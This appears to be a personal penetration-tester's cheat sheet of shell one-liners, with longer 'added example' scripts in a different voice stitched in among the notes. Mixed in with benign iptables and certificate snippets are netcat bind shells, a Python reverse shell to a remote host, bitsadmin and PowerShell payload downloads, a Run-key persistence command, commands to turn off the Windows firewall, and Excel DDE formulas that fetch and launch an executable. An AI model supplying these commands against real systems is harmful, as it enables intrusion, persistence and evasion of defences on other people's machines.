
Security Links

Brute force telnet with internal ids mech and no username

https://github.com/ashr/no-username-telnet-bruter


save cookies for reuse in cmdlines

 

wget -d --keep-session-cookies --save-cookies=cookies.txt --post-data="username=X&password=Y&login-form-type=Z" "https://"


Derp a remote service to your local ssh

ssh -R 9700:localhost:22 root@ZZZZZ


save a certificate to the ubuntu/debian trust store (take note: firefox has its own built-in store)

ensure the cert is in PEM format:

openssl x509 -inform DER -outform PEM -in ./derp.cert.der -out derp.pem.crt

ensure the cert has a .crt extension

copy the file to your local ca cache:

cp ./derp.pem.crt /usr/local/share/ca-certificates

instruct debian to add it to the store:

dpkg-reconfigure ca-certificates
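The four steps above as one script, added here as an example (it is not from the original notes): it detects whether the input is already PEM, converts from DER with openssl otherwise, forces the .crt extension the store requires, copies the file into the CA directory and runs the update. CA_DIR and UPDATE_CMD are assumed defaults of this example; the update uses update-ca-certificates, which is what dpkg-reconfigure ca-certificates ends up calling, and both can be overridden (for instance UPDATE_CMD=true to exercise the script without root).

```shell
#!/bin/bash
# Added example, not from the original notes: install a CA certificate into the
# Debian/Ubuntu system trust store with the format and extension checks the
# notes list. CA_DIR and UPDATE_CMD are assumed defaults; override them to run
# the function against a scratch directory (CA_DIR=/tmp/x UPDATE_CMD=true).
set -u

: "${CA_DIR:=/usr/local/share/ca-certificates}"
: "${UPDATE_CMD:=update-ca-certificates}"

# is_pem_cert <file>: 0 if the file is PEM (carries a BEGIN CERTIFICATE header),
# 1 otherwise (DER is binary and never contains that marker).
is_pem_cert() {
  grep -q -- '-----BEGIN CERTIFICATE-----' "$1"
}

# crt_name <file>: basename with the last extension replaced by .crt, because
# update-ca-certificates only picks up files in CA_DIR that end in .crt.
crt_name() {
  local base
  base="$(basename -- "$1")"
  base="${base%.*}"
  printf '%s.crt\n' "$base"
}

# install_ca_cert <cert-file>: convert DER to PEM when needed, copy the cert
# into CA_DIR under a .crt name and run the update command.
# Returns non-zero on any failure so callers can chain on it.
install_ca_cert() {
  local src="$1" dest
  [ -r "$src" ] || { echo "unreadable: $src" >&2; return 1; }
  dest="$CA_DIR/$(crt_name "$src")"
  mkdir -p -- "$CA_DIR" || return 1
  if is_pem_cert "$src"; then
    cp -- "$src" "$dest" || return 1
  else
    # Not PEM: assume DER and convert, the same openssl x509 step as above.
    openssl x509 -inform DER -outform PEM -in "$src" -out "$dest" || return 1
  fi
  $UPDATE_CMD
}
```

Usage: `install_ca_cert ./derp.cert.der` as root. Check afterwards that the new file appears in /etc/ssl/certs (update-ca-certificates symlinks it there and rebuilds ca-certificates.crt); if it does not, the usual cause is a missing .crt extension or a file that is not actually PEM.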

 

kill windows firewall:

netsh advfirewall set <profile> state off

where <profile> is AllProfiles, CurrentProfile, DomainProfile, PrivateProfile, or PublicProfile.

OR

Disable it in the registry, then reboot the machine with no network connectivity so domain policy doesn't overwrite it:

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall

Derp for derped services (list services):

cmd.exe /c wmic service list brief

Check ACLs

cmd.exe /c icacls "C:\derp.txt"


Download a file with powershell 2

$client = New-Object "System.Net.WebClient";$client.DownloadFile("http://derp/derp.zip","c:\tmp\derp.zip")


Download a file with bitsadmin

bitsadmin.exe /transfer "JobName" http://x.x.x.x/x.exe "c:\temp\x.exe"


Autorun registry one-liner

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "X.exe" /d "c:\temp\X.exe"


mirror a site index:

wget -kEpnp -e robots=off http://

tor nmap:

proxychains nmap -Pn -sT -p 80 x.x.x.1-255|grep -B4 open > x.x.x.1-255

---------

 

Wifi Bridge IPTables setup:

iptables -A FORWARD -i wlan1 -o wlan0 -j ACCEPT

iptables -A FORWARD -i wlan0 -o wlan1 -m state --state ESTABLISHED,RELATED -j ACCEPT

iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

iptables -t nat -A PREROUTING -s 10.42.0.0/16 -p tcp -m tcp --dport 80 -j REDIRECT --to-port 8080 

 

---

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
iptables -A FORWARD -i eth0 -o wlan0 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -s 10.42.0.0/16 -p tcp -m tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -s 10.42.0.0/16 -p tcp -m tcp --dport 443 -j REDIRECT --to-port 8443
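The two rule sets above assembled as one parameterised function, added here as an example (not from the original notes). The interface pairs (wlan1/wlan0 and wlan0/eth0), the 10.42.0.0/16 LAN and the 8080/8443 redirect ports come from the listings; DRY_RUN and the run/add_rule helpers are assumptions of this example. Each rule is appended only if `iptables -C` reports it absent, so re-running the script does not stack duplicate rules, and DRY_RUN=1 prints the generated rule set for review instead of applying it.

```shell
#!/bin/bash
# Added example, not from the original notes: build the forward/NAT/redirect
# rule set from the two listings above as a function of the interface names,
# so the same script serves the wlan1->wlan0 and wlan0->eth0 variants.
# DRY_RUN=1 prints the commands instead of executing them (assumption of this
# example), which also lets the rule set be reviewed before it touches a box.
set -u

: "${DRY_RUN:=0}"

# run <cmd...>: execute the command, or echo it when DRY_RUN=1.
run() {
  if [ "$DRY_RUN" = 1 ]; then
    printf '%s\n' "$*"
  else
    "$@"
  fi
}

# add_rule <table> <chain> <rule args...>: append the rule only if it is not
# already present. iptables -C returns 0 when an identical rule exists, so a
# second run of the script is a no-op rather than a duplicate.
add_rule() {
  local table="$1" chain="$2"
  shift 2
  if [ "$DRY_RUN" != 1 ] && iptables -t "$table" -C "$chain" "$@" 2>/dev/null; then
    return 0
  fi
  run iptables -t "$table" -A "$chain" "$@"
}

# nat_bridge <lan_if> <wan_if> <lan_net> [http_to] [https_to]
# Enables forwarding, lets LAN->WAN traffic out and only replies back in,
# masquerades behind the WAN interface and redirects LAN web traffic to the
# local ports (defaults 8080 and 8443 as in the notes).
nat_bridge() {
  local lan_if="$1" wan_if="$2" lan_net="$3"
  local http_to="${4:-8080}" https_to="${5:-8443}"
  run sysctl -w net.ipv4.ip_forward=1
  add_rule filter FORWARD -i "$lan_if" -o "$wan_if" -j ACCEPT
  add_rule filter FORWARD -i "$wan_if" -o "$lan_if" -m state --state ESTABLISHED,RELATED -j ACCEPT
  add_rule nat POSTROUTING -o "$wan_if" -j MASQUERADE
  add_rule nat PREROUTING -s "$lan_net" -p tcp -m tcp --dport 80 -j REDIRECT --to-port "$http_to"
  add_rule nat PREROUTING -s "$lan_net" -p tcp -m tcp --dport 443 -j REDIRECT --to-port "$https_to"
}
```

Run it as `DRY_RUN=1 nat_bridge wlan0 eth0 10.42.0.0/16` first and read the six lines it prints; the two PREROUTING REDIRECTs only make sense when something is listening on 8080 and 8443 on the bridge host, otherwise client HTTP/HTTPS from the LAN is silently black-holed.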

----------

 

Flush IPTables:

#!/bin/bash

# This function resets iptables to their default state
reset_iptables () {
  IPTABLES="$(which iptables)"

  # RESET DEFAULT POLICIES (mangle has five built-in chains, all reset here)
  $IPTABLES -P INPUT ACCEPT
  $IPTABLES -P FORWARD ACCEPT
  $IPTABLES -P OUTPUT ACCEPT
  $IPTABLES -t nat -P PREROUTING ACCEPT
  $IPTABLES -t nat -P POSTROUTING ACCEPT
  $IPTABLES -t nat -P OUTPUT ACCEPT
  $IPTABLES -t mangle -P PREROUTING ACCEPT
  $IPTABLES -t mangle -P INPUT ACCEPT
  $IPTABLES -t mangle -P FORWARD ACCEPT
  $IPTABLES -t mangle -P OUTPUT ACCEPT
  $IPTABLES -t mangle -P POSTROUTING ACCEPT

  # FLUSH ALL RULES, ERASE NON-DEFAULT CHAINS, ZERO THE COUNTERS
  $IPTABLES -F
  $IPTABLES -X
  $IPTABLES -Z
  $IPTABLES -t nat -F
  $IPTABLES -t nat -X
  $IPTABLES -t mangle -F
  $IPTABLES -t mangle -X
  $IPTABLES -t raw -F
  $IPTABLES -t raw -X
}

reset_iptables

---------


Setup Ethernet Bridge:

#!/bin/bash

# clear the addresses on both interfaces so the bridge owns the IP
ifconfig eth0 0.0.0.0
ifconfig eth2 0.0.0.0

# create the bridge and enslave both interfaces
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth2

# get an address for the bridge itself
dhclient br0

ifconfig br0 netmask 255.0.0.0

------

 

Block all DNS except from:

# Allow DNS (53) from <source IP>

iptables -A INPUT -p udp --dport 53 -s <source IP> -j ACCEPT

iptables -A INPUT -p tcp --dport 53 -s <source IP> -j ACCEPT

 

# Deny all other DNS requests

iptables -A INPUT -p udp --dport 53 -j DROP

iptables -A INPUT -p tcp --dport 53 -j DROP

 

# Delete the two DROP rules above
iptables -D INPUT -p udp --dport 53 -j DROP
iptables -D INPUT -p tcp --dport 53 -j DROP
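The allow-list above generalised to any number of permitted sources, added here as an example (not from the original notes): one function emits the ACCEPT rules per source and protocol followed by the catch-all DROPs, and the same function with D instead of A emits the matching delete commands. Source addresses are checked to be IPv4 or IPv4/CIDR before anything is applied. DRY_RUN and the run helper are assumptions of this example; `<source IP>` from the notes becomes the function's arguments.

```shell
#!/bin/bash
# Added example, not from the original notes: build the DNS allow-list rules
# for several sources, plus their deletions. DRY_RUN=1 prints the commands
# instead of executing them (an assumption of this example).
set -u

: "${DRY_RUN:=0}"

# run <cmd...>: execute the command, or echo it when DRY_RUN=1.
run() {
  if [ "$DRY_RUN" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi
}

# valid_ipv4 <addr[/prefix]>: 0 if the address has four octets in 0-255 and
# the optional prefix is 0-32, 1 otherwise. Pure shell, no external tools.
valid_ipv4() {
  local addr="$1" ip prefix octet old_ifs
  ip="${addr%%/*}"
  prefix="${addr#*/}"
  # with no '/' present, ${addr#*/} is the whole string: treat as a /32 host
  [ "$prefix" = "$addr" ] && prefix=32
  case "$prefix" in ''|*[!0-9]*) return 1;; esac
  [ "$prefix" -le 32 ] || return 1
  old_ifs="$IFS"
  set -f                      # no globbing while the address is split on '.'
  IFS=.
  set -- $ip
  IFS="$old_ifs"
  set +f
  [ $# -eq 4 ] || return 1
  for octet in "$@"; do
    case "$octet" in ''|*[!0-9]*) return 1;; esac
    [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# dns_rules <A|D> <source>...: append (A) or delete (D) the ACCEPT rules for
# every source over udp and tcp, then the two catch-all DROPs. Returns 1 on a
# malformed source and 2 on a bad action, applying nothing in either case.
dns_rules() {
  local action="$1" src proto
  shift
  case "$action" in A|D) ;; *) echo "action must be A or D" >&2; return 2;; esac
  for src in "$@"; do
    valid_ipv4 "$src" || { echo "bad source: $src" >&2; return 1; }
  done
  for src in "$@"; do
    for proto in udp tcp; do
      run iptables "-$action" INPUT -p "$proto" --dport 53 -s "$src" -j ACCEPT
    done
  done
  for proto in udp tcp; do
    run iptables "-$action" INPUT -p "$proto" --dport 53 -j DROP
  done
}
```

Order matters: iptables evaluates INPUT top to bottom, so once the DROPs are in place a source added later with `-A` lands behind them and never matches. Add a new source with `-I INPUT` (insert at the top) instead, or delete the set with `dns_rules D ...` and re-apply it with the full list.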

---------

Silly shells

nc -v -l -p 9997 -e /bin/bash
ncat -v -l -p 9997 -e /bin/sh

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

cmd.exe /c

 

Groovy Script (Jenkins)

def process = "c:\\temp\\x.exe".execute()
println "${process.text}"

 

#msf

Windows XP SP3 for demos and learners: ms08_067_netapi

 

Excel fuckery

Download shell

=cmd|'/C bitsadmin.exe /transfer D http://192.168.1.107/pjep.exe c:\temp\pjep.exe'!'A10'

Popit

=cmd|'/C c:\temp\pjep.exe'!'A10'

 

Metasploit easy wins
Windows XP service pack 3
ms08_067

Beef easy wins
HTA

x64 stack frames